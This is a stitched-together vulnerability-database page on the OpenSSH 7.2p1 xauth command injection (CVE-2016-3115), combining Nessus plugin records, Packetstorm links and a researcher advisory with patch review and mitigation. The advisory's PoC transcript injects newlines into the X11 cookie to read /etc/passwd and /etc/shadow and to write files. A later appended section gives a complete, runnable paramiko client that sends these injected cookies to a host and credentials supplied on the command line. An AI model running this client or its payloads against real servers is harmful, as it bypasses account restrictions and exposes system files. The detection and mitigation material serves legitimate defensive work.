- Add KbdInteractiveAuthentication documentation to man sshd_config (#1109251)
- Correct freeing newkeys structure when privileged monitor exits (#1208584)
- Fix problems with failing persistent connections (#1131585)
- Fix memory leaks in auditing patch (#1208584)
- Better approach to logging sftp commands in chroot
- Make sshd -T write all config options and add missing Cipher, MAC to man (#1109251)
- Add missing ControlPersist option to man ssh (#1197763)
- Add sftp option to force mode of created files (#1191055)
- Do not load RSA1 keys in FIPS mode (#1197072)
- Add missing support for ECDSA in ssh-keyscan (#1196331)
- Fix coverity/gcc issues (#1196063)
- Backport wildcard functionality for PermitOpen in sshd_config file (#1159055)
- Ability to specify an arbitrary LDAP filter in ldap.conf (#1119506)
- Fix ControlPersist option with ProxyCommand (#1160487)
- Backport fix of ssh-keygen with error : gethostname: File name too long (#1161454)
- Backport show remote address instead of UNKNOWN after timeout at password prompt (#1161449)
- Fix printing of extensions in v01 certificates (#1093869)
- Fix confusing audit trail for unsuccessful logins (#1127312)
- Don
last seen 2020-06-01
modified 2020-06-02
plugin id 90076
published 2016-03-22
reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/90076
title OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0038)

NASL family Oracle Linux Local Security Checks
NASL id ORACLELINUX_ELSA-2016-3531.NASL
description Description of changes: [4.3p2-82.0.2]
- CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (John Haxby) [orabug 22985024]
- CVE-2016-3115: missing sanitisation of input for X11 forwarding (John Haxby) [orabug 22985024]
last seen 2020-06-01
modified 2020-06-02
plugin id 90342
published 2016-04-05
reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/90342
title Oracle Linux 5 : openssh (ELSA-2016-3531)

NASL family Fedora Local Security Checks
NASL id FEDORA_2016-0BCAB055A7.NASL
description This update provides recent upstream fix published with openssh-7.2p2 (#1316529). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen 2020-06-05
modified 2016-03-28
plugin id 90209
published 2016-03-28
reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/90209
title Fedora 24 : openssh-7.2p2-1.fc24 (2016-0bcab055a7)

NASL family Fedora Local Security Checks
NASL id FEDORA_2016-BB59DB3C86.NASL
description This update provides recent upstream (security) release, sanitizing X11 authentication credentials. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen 2020-06-05
modified 2016-03-14
plugin id 89887
published 2016-03-14
reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/89887
title Fedora 23 : openssh-7.2p2-1.fc23 (2016-bb59db3c86)

NASL family SuSE Local Security Checks
NASL id SUSE_SU-2016-2388-1.NASL
description This update for OpenSSH fixes the following issues :
- Prevent user enumeration through the timing of password processing. (bsc#989363, CVE-2016-6210)
- Allow lowering the DH groups parameter limit in server as well as when GSSAPI key exchange is used. (bsc#948902)
- Sanitize input for xauth(1). (bsc#970632, CVE-2016-3115)
- Prevent X11 SECURITY circumvention when forwarding X11 connections. (bsc#962313, CVE-2016-1908)
- Disable DH parameters under 2048 bits by default and allow lowering the limit back to the RFC 4419 specified minimum through an option. (bsc#932483, bsc#948902)
- Ignore PAM environment when using login. (bsc#975865, CVE-2015-8325)
- Limit the accepted password length (prevents a possible denial of service). (bsc#992533, CVE-2016-6515)
- Relax version requires for the openssh-askpass sub-package. (bsc#962794)
- Avoid complaining about unset DISPLAY variable. (bsc#981654)
- Initialize message id to prevent connection breakups in some cases. (bsc#959096)
Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen 2020-06-01
modified 2020-06-02
plugin id 93735
published 2016-09-27
reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/93735
title SUSE SLES11 Security Update : openssh (SUSE-SU-2016:2388-1)

NASL family CentOS Local Security Checks
NASL id CENTOS_RHSA-2016-0465.NASL
description Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD
last seen 2020-06-01
modified 2020-06-02
plugin id 90068
published 2016-03-22
reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/90068
title CentOS 7 : openssh (CESA-2016:0465)

NASL family AIX Local Security Checks
NASL id AIX_OPENSSH_ADVISORY8.NASL
description The remote AIX host has a version of OpenSSH installed that is affected by the following vulnerabilities :
- A remote code execution vulnerability exists in the sshd server component of OpenSSH due to improper sanitization of X11 authentication credentials. An authenticated, remote attacker can exploit this vulnerability to inject arbitrary xauth commands. (CVE-2016-3115)
- A security bypass vulnerability exists in the sshd server component of OpenSSH due to improper error handling. An authenticated, remote attacker can exploit this vulnerability, when an authentication cookie is generated during untrusted X11 forwarding, to gain access to the X server on the host system. (CVE-2016-1908)
last seen 2020-06-01
modified 2020-06-02
plugin id 90942
published 2016-05-06
reporter This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.
source https://www.tenable.com/plugins/nessus/90942
title AIX OpenSSH Advisory : openssh_advisory8.asc

NASL family Slackware Local Security Checks
NASL id SLACKWARE_SSA_2016-070-01.NASL
description New openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix security issues.
last seen 2020-06-01
modified 2020-06-02
plugin id 89836
published 2016-03-11
reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source https://www.tenable.com/plugins/nessus/89836
title Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : openssh (SSA:2016-070-01)
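The OPENSSH_72P2.NASL record above detects the flaw from the SSH banner alone ("prior to 7.2p2"), while the distribution plugins (RHEL, Gentoo, SUSE and the rest) compare package versions, because their fixes are backported without changing the upstream version string. The following is an added example, not Tenable's plugin code; the type and function names are hypothetical. It implements the banner side of that check in C: parse the OpenSSH version out of an identification string, including three-part versions such as 6.6.1p1, and compare it with 7.2p2, the first upstream release that sanitises the X11 forwarding request.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not Tenable plugin code. Names are hypothetical.
 * 7.2p1 -> {7, 2, 0, 1}; 6.6.1p1 -> {6, 6, 1, 1}; 5.3 -> {5, 3, 0, 0}. */
typedef struct {
    int major, minor, micro, portable;
} ossh_ver;

/* Parse an SSH identification banner such as
 *   "SSH-2.0-OpenSSH_7.2p1 Debian-4"  or  "SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13"
 * Returns 1 on success, 0 if the banner is not OpenSSH or carries no readable version. */
int parse_openssh_banner(const char *banner, ossh_ver *v)
{
    const char *p = strstr(banner, "OpenSSH_");
    char *end;

    if (p == NULL)
        return 0;
    p += strlen("OpenSSH_");
    memset(v, 0, sizeof *v);

    v->major = (int)strtol(p, &end, 10);          /* mandatory: major '.' minor */
    if (end == p || *end != '.')
        return 0;
    p = end + 1;
    v->minor = (int)strtol(p, &end, 10);
    if (end == p)
        return 0;
    p = end;
    if (*p == '.') {                               /* optional micro, e.g. 6.6.1 */
        v->micro = (int)strtol(p + 1, &end, 10);
        if (end == p + 1)
            return 0;
        p = end;
    }
    if (*p == 'p') {                               /* optional portable release, e.g. p1 */
        v->portable = (int)strtol(p + 1, &end, 10);
        if (end == p + 1)
            return 0;
    }
    return 1;
}

/* Negative if a < b, zero if equal, positive if a > b. */
int ossh_ver_cmp(const ossh_ver *a, const ossh_ver *b)
{
    if (a->major != b->major) return a->major - b->major;
    if (a->minor != b->minor) return a->minor - b->minor;
    if (a->micro != b->micro) return a->micro - b->micro;
    return a->portable - b->portable;
}

/* 1 if the banner advertises an OpenSSH older than 7.2p2, otherwise 0.
 * Non-OpenSSH banners also yield 0: this check says nothing about them. */
int banner_older_than_7_2p2(const char *banner)
{
    ossh_ver v;
    const ossh_ver fixed = { 7, 2, 0, 2 };

    if (!parse_openssh_banner(banner, &v))
        return 0;
    return ossh_ver_cmp(&v, &fixed) < 0;
}

int main(void)
{
    /* Constructed sample banners, not captured from real hosts. */
    const char *samples[] = {
        "SSH-2.0-OpenSSH_7.2p1 Debian-4",
        "SSH-2.0-OpenSSH_7.2p2",
        "SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13",
        "SSH-2.0-OpenSSH_5.3",          /* RHEL 6 style banner: backported fix, still flagged here */
        "SSH-2.0-dropbear_2016.74",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-45s older than 7.2p2: %d\n", samples[i], banner_older_than_7_2p2(samples[i]));
    return 0;
}
```

A banner such as `SSH-2.0-OpenSSH_5.3` from a RHEL 6 host already updated to `openssh-5.3p1-114.el6_7` (the package the RHSA-2016:0466 plugin above looks for) is reported as older than 7.2p2 here, which is exactly why the distribution plugins check the rpm version instead. Treat a banner hit as a lead to confirm with a package-level check, or by verifying that `X11Forwarding` is off in `sshd_config`, which removes the affected code path regardless of version.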
Packetstorm
data source https://packetstormsecurity.com/files/download/136234/opensshfalse-bypass.txt
id PACKETSTORM:136234
last seen 2016-12-05
published 2016-03-15
reporter INTREST SEC
source https://packetstormsecurity.com/files/136234/OpenSSH-7.2p1-xauth-Command-Injection-Bypass.html
title OpenSSH 7.2p1 xauth Command Injection / Bypass

data source https://packetstormsecurity.com/files/download/140019/logstorm.py.txt
id PACKETSTORM:140019
last seen 2016-12-05
published 2016-12-05
reporter Jeremy Brown
source https://packetstormsecurity.com/files/140019/BlackStratus-LOGStorm-4.5.1.35-4.5.1.96-Remote-Root.html
title BlackStratus LOGStorm 4.5.1.35 / 4.5.1.96 Remote Root
Seebug
bulletinFamily exploit
description Source link: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115

### VuNote

Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
Version: 0.2
Date: Mar 3rd, 2016
Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass

### Overview

Name: openssh
Vendor: OpenBSD
References:
* http://www.openssh.com/ [1]
Version: 7.2p1 [2]
Latest Version: 7.2p1
Other Versions: <= 7.2p1 (all versions; dating back ~20 years)
Platform(s): linux
Technology: c
Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-3115

### Description

quote website [1]

> OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.

### Summary

An authenticated user may inject arbitrary xauth commands by sending an x11 channel request that includes a newline character in the x11 cookie. The newline acts as a command separator to the xauth binary. This attack requires the server to have `X11Forwarding yes` enabled; disabling it mitigates this vector.

By injecting xauth commands one gains limited* read/write access to arbitrary files, information leakage or xauth-connect capabilities. These capabilities can be leveraged by an authenticated restricted user - e.g. one with the login shell configured as /bin/false or one with configured forced-commands - to bypass account restrictions. This is generally not expected. The injected xauth commands are performed with the effective permissions of the logged-in user, as sshd has already dropped its privileges.

Quick-Info:
* requires: X11Forwarding yes
* bypasses /bin/false and forced-commands
* OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)
* does not bypass /bin/nologin (as there is special treatment for this)

Capabilities (xauth):
* Xauth
  * write file: limited chars, xauthdb format
  * read file: limited, lines cut at first \s
  * infoleak: environment
  * connect to other devices (may allow port probing)

see attached PoC, Patch

### Details

// see annotated code below

* server_input_channel_req (serverloop.c)
  * session_input_channel_req:2299 (session.c [2])
  * session_x11_req:2181
* do_exec_pty or do_exec_no_pty
  * do_child
  * do_rc_files (session.c:1335 [2])

Upon receiving an `x11-req` type channel request, sshd parses the channel request parameters `auth_proto` and `auth_data` from the client ssh packet, where `auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) and `auth_data` contains the actual x11 auth cookie. This information is stored in a session-specific datastore.

When calling `execute` on that session, sshd will call `do_rc_files`, which tries to figure out whether this is an x11 call by evaluating whether `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND there is no system `/sshrc` on the server AND no user-specific `$HOME/.ssh/rc` is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`. Note that neither `auth_data` nor `auth_proto` is sanitized or validated; both contain user-tainted data as received. Since `xauth` commands are passed via `stdin` and `\n` is a command separator to the `xauth` binary, this allows a client to inject arbitrary `xauth` commands.

Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted input as arguments to that script.

Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]

This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth command injection:

```
SYNOPSIS
       xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]

       add displayname protocolname hexkey
       generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
       [n]extract filename displayname...
       [n]list [displayname...]
       [n]merge [filename...]
       remove displayname...
       source filename
       info
       exit
       quit
       version
       help
       ?
```

Interesting commands are:

info - leaks environment information / path

```
~# xauth info
xauth:  file /root/.Xauthority does not exist
Authority file:       /root/.Xauthority
File new:             yes
File locked:          no
Number of entries:    0
Changes honored:      yes
Changes made:         no
Current input:        (argv):1
```

source - arbitrary file read (cut on first `\s`)

```
# xauth source /etc/shadow
xauth:  file /root/.Xauthority does not exist
xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
```

extract - arbitrary file write
* limited characters
* in xauth.db format
* since it is not compressed it can be combined with `xauth add` to first store data in the database and then export it to an arbitrary location, e.g. to plant a shell or do other things.

generate - connect to <ip>:<port> (port probing, connect back and potentially exploit vulnerabilities in X.org)

### Source

Inline annotations are prefixed with `//#!`

```c
/*
 * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
 * first in this order).
 */
static void
do_rc_files(Session *s, const char *shell)
{
	...
		snprintf(cmd, sizeof cmd, "%s -q -", options.xauth_location);
		f = popen(cmd, "w");   //#! run xauth -q -
		if (f) {
			fprintf(f, "remove %s\n",   //#! remove <user_tainted_data> - injecting \n into auth_display injects an xauth command
			    s->auth_display);
			fprintf(f, "add %s %s %s\n",   //#! \n injection
			    s->auth_display, s->auth_proto,
			    s->auth_data);
			pclose(f);
		} else {
			fprintf(stderr, "Could not run %s\n", cmd);
		}
	}
}
```

### Proof of Concept

Prerequisites:
* install python 2.7.x
* issue `#> pip install paramiko` to install the `paramiko` ssh library for python 2.x
* run `poc.py`

Usage: <host> <port> <username> <password or path_to_privkey>

path_to_privkey - path to private key in pem format, or '.demoprivkey' to use the demo private key

poc:

1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:

```
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user1/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box

#cat /etc/passwd
user2:x:1001:1002:,,,:/home/user2:/bin/false
```

2. run sshd with `X11Forwarding yes` (kali default config)

```
#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d
```

3. `forced-commands` - connect with user1 and display env information

```
#> python <host> 22 user1 .demoprivkey
INFO:__main__:add this line to your authorized_keys file:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box

INFO:__main__:connecting to: user1:<PKEY>@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>

#> .info
DEBUG:__main__:auth_cookie: '\ninfo'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:Authority file:       /home/user1/.Xauthority
File new:             no
File locked:          no
Number of entries:    1
Changes honored:      yes
Changes made:         no
Current input:        (stdin):3
/usr/bin/xauth: (stdin):2:  bad "add" command line
...
```

4. `forced-commands` - read `/etc/passwd`

```
...
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
```

5. `forced-commands` - write `/tmp/testfile`

```
#> .writefile /tmp/testfile `thisisatestfile`
DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:/usr/bin/xauth: (stdin):2:  bad "add" command line

#> ls -lsat /tmp/testfile
4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile
#> cat /tmp/testfile
ú65500hiú65500`thisisatestfile`ª
```

6. `/bin/false` - connect and read `/etc/passwd`

```
#> python <host> 22 user2 user2password
INFO:__main__:connecting to: user2:user2password@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>

#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
user2:x:1001:1002:,,,:/home/user2:/bin/false ... ``` 7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100 ```c #> generate 8.8.8.8:100 . #> tcpdump IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0 ``` ### Troubleshooting **Q**: `ImportError: No module named py3compat` **A**: outdated `paramiko` please upgrade with `pip install --upgrade paramiko` ### Proposed Patch * Sanitize user-tainted input `s->auth_data`, `s->auth_proto`, `s->display` by replacing all non-printables by spaces. (I know this is kind of ugly ;)) ```c #> ~/openssh-7.2p1# diff -u session.c session.c.patched --- session.c 2016-02-17 11:32:11.616868923 -0500 +++ session.c.patched 2016-02-17 11:33:33.681596273 -0500 @@ -1327,6 +1327,18 @@ return env; } +char * +sanitize_non_printable(char *s) { + char *ptr = s; + while (*ptr != '\0'){ + if ((*ptr < 0x20)||(*s >= 0x7f )){ /* sanitizing \n would basically be enough */ + *ptr = ' '; + } + ptr++; + } + return s; +} + /* * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found * first in this order). 
@@ -1341,6 +1353,9 @@ do_xauth = s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL; + sanitize_non_printable(s->display); + sanitize_non_printable(s->auth_proto); + sanitize_non_printable(s->auth_data); /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */ if (!s->is_subsystem && options.adm_forced_command == NULL && !no_user_rc && options.permit_user_rc && ``` ### Mitigation / Workaround * disable x11-forwarding: `sshd_config` set `X11Forwarding no` * disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys` Notes ----- Verified, resolved and released within a few days. very impressive. Vendor response: see advisory [5] ### References [1] http://www.openssh.com/ [2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388 [3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376 [4] http://linux.die.net/man/1/xauth [5] http://www.openssh.com/txt/x11fwd.adv ### Contact https://github.com/tintinweb |
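Review bot: in the first hunk of the proposed patch (`@@ -1327,6 +1327,18 @@`), the high-byte half of the test in `sanitize_non_printable`, `(*s >= 0x7f )`, reads the first character of the string on every iteration instead of the current one, so a byte of 0x7f or above anywhere after position 0 is never rewritten; the condition should be `if ((*ptr < 0x20) || (*ptr >= 0x7f))`. Replacing the byte with a space also keeps the tainted data inside the command stream: xauth splits each line on whitespace, so an injected `\n` turns into extra arguments to `add` (xauth then reports a bad `add` line) instead of the X11 request being refused. Refusing the request when `auth_proto` or `auth_data` contains anything outside printable, non-whitespace ASCII is the cleaner fix, and that check belongs where the strings are received (`session_x11_req`) rather than at the point of use.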
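Review bot: in the second hunk (`@@ -1341,6 +1353,9 @@`) the three `sanitize_non_printable()` calls run unconditionally right after `do_xauth` has been computed from `s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL`, so for a session that made no X11 request, where those pointers are NULL, the function dereferences NULL in `while (*ptr != '\0')` and sshd crashes; wrap the three calls in `if (do_xauth) { ... }` or move them into the block that actually runs xauth. Note also that the string written into the xauth stream by the `remove`/`add` lines in the excerpt above is `s->auth_display`, not `s->display`, so if the display string is ever considered tainted the sanitisation targets the wrong field.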
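The mechanics of the `do_rc_files()` excerpt and of the two fix strategies (the proposed patch's rewrite versus refusing the request), modelled in Python as an added example. This is not OpenSSH code: the two `fprintf()` calls are reproduced as string formatting, the display, protocol and cookie values are constructed, and `handle_x11_request`, `xauth_valid_string` and `sanitize_like_patch` are this example's names, not sshd's.

```python
"""Model of the xauth command stream that 7.2p1 sshd writes in do_rc_files().

Added example, not OpenSSH code: the two fprintf() calls from the session.c
excerpt are reproduced as string formatting so the effect of a newline in the
client-supplied X11 auth cookie can be examined without sshd or xauth.  It also
shows the rewrite strategy of the proposed patch next to a reject strategy.
Display, protocol and cookie values below are constructed.
"""


def build_xauth_stdin(auth_display, auth_proto, auth_data):
    """Text sshd pipes into `xauth -q -` (mirrors the remove/add fprintf lines)."""
    return ("remove %s\n" % auth_display
            + "add %s %s %s\n" % (auth_display, auth_proto, auth_data))


def xauth_commands(stdin_text):
    """Command names as xauth's stdin reader sees them: one command per line,
    arguments split on whitespace.  Blank lines are ignored."""
    return [line.split()[0] for line in stdin_text.split("\n") if line.split()]


def xauth_valid_string(s):
    """Reject strategy: a protocol name or hex cookie must be non-empty and made
    of printable, non-whitespace ASCII only (0x21..0x7e).  Newlines, spaces and
    other control bytes would all change how xauth tokenises the stream."""
    return bool(s) and all(0x21 <= ord(c) <= 0x7e for c in s)


def sanitize_like_patch(s):
    """Rewrite strategy of the proposed patch: control and high bytes become
    spaces.  (Every byte is tested here; the patch's high-byte test reads the
    first character of the string instead of the current one.)"""
    return "".join(" " if (ord(c) < 0x20 or ord(c) >= 0x7f) else c for c in s)


def handle_x11_request(auth_display, auth_proto, auth_data):
    """Hardened session_x11_req: validate when the request arrives and refuse
    it on bad data.  Returns the stream that would later be written, or None
    when the request is rejected."""
    if not (xauth_valid_string(auth_proto) and xauth_valid_string(auth_data)):
        return None
    return build_xauth_stdin(auth_display, auth_proto, auth_data)


# Constructed sample values (the display is one sshd would allocate itself).
DISPLAY = "localhost:10.0"
PROTO = "MIT-MAGIC-COOKIE-1"
GOOD_COOKIE = "d2ab9e2f0c1c2fb1d97d2a5be25a3e83"
# The cookie the PoC sends for `.readfile /etc/passwd`: junk hex, then new lines.
INJECTED_COOKIE = "xxxx\nsource /etc/passwd\n"

if __name__ == "__main__":
    for cookie in (GOOD_COOKIE, "\ninfo", INJECTED_COOKIE):
        stream = build_xauth_stdin(DISPLAY, PROTO, cookie)
        print("%-28r -> %s" % (cookie, xauth_commands(stream)))
    rewritten = sanitize_like_patch(INJECTED_COOKIE)
    print("patch rewrite  ->", xauth_commands(build_xauth_stdin(DISPLAY, PROTO, rewritten)))
    print("reject         ->", handle_x11_request(DISPLAY, PROTO, INJECTED_COOKIE))
```

With the benign cookie the stream holds exactly `remove` and `add`; with `\ninfo` a third command appears on line 3, which is why the PoC transcript reports `Current input: (stdin):3` and a bad `add` on line 2. The rewrite leaves a malformed `add` with extra arguments, whereas the reject strategy never lets the request reach `do_rc_files()` at all.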
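The client side of the PoC procedure above, as an added example rather than the advisory's `poc.py`: the builders return exactly the `auth_cookie` values shown in the transcript, and `run_xauth()` delivers one of them over paramiko by issuing the x11-req before a dummy exec, so that sshd's `do_rc_files()` runs with the injected cookie. `SCRATCH_DISPLAY`, `connect()`, `run_xauth()` and the cookie builders are this example's own names; the paramiko calls used (`SSHClient.connect`, `Transport.open_session`, `Channel.request_x11`, `Channel.exec_command`) are the library's real API.

```python
"""Client side of the PoC: deliver the injected cookie over SSH.

Added example, not the advisory's poc.py.  The cookie builders reproduce the
payloads shown in the PoC transcript; run_xauth() sends one of them in an
x11-req and then triggers a dummy exec so that sshd runs do_rc_files().
Host, port and credentials are supplied by the caller.
"""

SCRATCH_DISPLAY = "127.0.0.250:65500"   # throwaway display used by the PoC's .writefile


def _no_whitespace(value, what):
    # xauth splits every command line on whitespace, so an argument containing
    # any would become extra arguments: this is the "limited characters"
    # restriction of the write primitive.
    if not value or any(c.isspace() for c in value):
        raise ValueError("%s must be non-empty and contain no whitespace" % what)
    return value


def info_cookie():
    """`.info`: the leading newline makes `info` a third command line."""
    return "\ninfo"


def readfile_cookie(path):
    """`.readfile <path>`: xauth `source` echoes each line of the file back."""
    return "xxxx\nsource %s\n" % _no_whitespace(path, "path")


def writefile_cookies(path, data):
    """`.writefile <path> <data>`: two requests.  `add` stores the data as the
    auth name of a scratch display, `extract` then writes that entry to path."""
    return [
        "\nadd %s %s aa" % (SCRATCH_DISPLAY, _no_whitespace(data, "data")),
        "\nextract %s %s" % (_no_whitespace(path, "path"), SCRATCH_DISPLAY),
    ]


def run_xauth(client, cookie, timeout=10.0):
    """Open a session, send the cookie in an x11-req, then exec a dummy command.
    Returns (stdout, stderr) of the session.  paramiko raises SSHException if
    the server refuses the X11 request (patched sshd, X11Forwarding no, or a
    key with the no-x11-forwarding option)."""
    chan = client.get_transport().open_session()
    chan.settimeout(timeout)
    chan.request_x11(auth_protocol="MIT-MAGIC-COOKIE-1", auth_cookie=cookie)
    # The forced command or login shell runs instead of `true`; sshd runs the
    # rc files, and therefore xauth, before it either way.
    chan.exec_command("true")
    out = chan.makefile().read().decode("utf-8", errors="replace")
    err = chan.makefile_stderr().read().decode("utf-8", errors="replace")
    chan.close()
    return out, err


def connect(host, port, username, password=None, key_filename=None):
    import paramiko  # imported here so the builders above work without it
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # lab use only
    client.connect(host, port=port, username=username, password=password,
                   key_filename=key_filename, allow_agent=False, look_for_keys=False)
    return client


if __name__ == "__main__":
    import sys
    host, port, user, password = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
    client = connect(host, port, user, password=password)
    try:
        out, err = run_xauth(client, readfile_cookie("/etc/passwd"))
        print(out)
        print(err)
    finally:
        client.close()
```

The order matters: the x11-req has to be accepted before `exec_command`, because the cookie is only written to `xauth -q -` from `do_rc_files()` when the session starts. Against 7.2p2 or a server with X11 forwarding disabled the `request_x11` call fails, which makes the same script a quick check that the fix or the workaround is in place.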
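What the `.writefile` step above actually leaves on disk, as an added example (not part of the advisory and not xauth code): a serialiser and parser for the Xauthority entry format. It explains the `ú65500`thisisatestfile`ª` that `cat` printed (0xfa is the last octet of 127.0.0.250 and 0xaa the one-byte hexkey; the length bytes and the other three octets are unprintable) and why the primitive has "limited characters". The 59-byte size in the listing is consistent with a second, 22-byte entry for the same display whose name is `hi` and whose key is one byte, which is what the leading `ú65500hi` suggests was left by an earlier `add`. Function names are this example's own, and non-IP display hosts are simplified.

```python
"""Xauthority record layout behind the PoC's `.writefile` step.

Added example, not from the advisory or from xauth: it serialises what
`xauth add 127.0.0.250:65500 `thisisatestfile` aa` stores and what
`xauth extract /tmp/testfile 127.0.0.250:65500` therefore writes, and parses
such a file back.  Layout of one entry (libXau, every length a 16-bit
big-endian integer): family, address, display number, auth name, auth data.
The dotted-quad handling mirrors the page's `cat` output; other host forms are
simplified here (real xauth resolves host names).
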